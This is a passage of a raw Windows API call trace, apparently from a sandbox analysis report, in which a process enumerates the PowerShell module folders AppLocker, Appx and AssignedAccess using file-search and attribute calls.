lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0151.432] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5370 [0151.433] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0151.433] FindNextFileW (in: hFindFile=0x2386d3b5370, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0151.433] FindClose (in: hFindFile=0x2386d3b5370 | out: hFindFile=0x2386d3b5370) returned 1 [0151.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.433] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0151.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.435] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0151.435] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.435] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.436] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.436] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.436] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0151.436] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.436] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.437] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0151.437] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0151.437] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0151.437] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.437] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0151.437] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.437] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0151.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.438] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.438] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0151.438] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5490 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.439] FindNextFileW (in: hFindFile=0x2386d3b5490, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.439] FindClose (in: hFindFile=0x2386d3b5490 | out: hFindFile=0x2386d3b5490) returned 1 [0151.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.440] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0151.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.441] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0151.441] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5310 [0151.442] FindNextFileW (in: hFindFile=0x2386d3b5310, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.442] FindNextFileW (in: hFindFile=0x2386d3b5310, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0151.442] FindNextFileW (in: hFindFile=0x2386d3b5310, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0151.442] FindNextFileW (in: hFindFile=0x2386d3b5310, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.442] FindNextFileW (in: hFindFile=0x2386d3b5310, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.442] FindClose (in: hFindFile=0x2386d3b5310 | out: hFindFile=0x2386d3b5310) returned 1 [0151.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.443] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0151.443] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4ad0 [0151.443] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.443] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0151.443] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0151.443] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0151.443] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0151.443] FindClose (in: hFindFile=0x2386d3b4ad0 | out: hFindFile=0x2386d3b4ad0) returned 1 [0151.444] SetThreadErrorMode 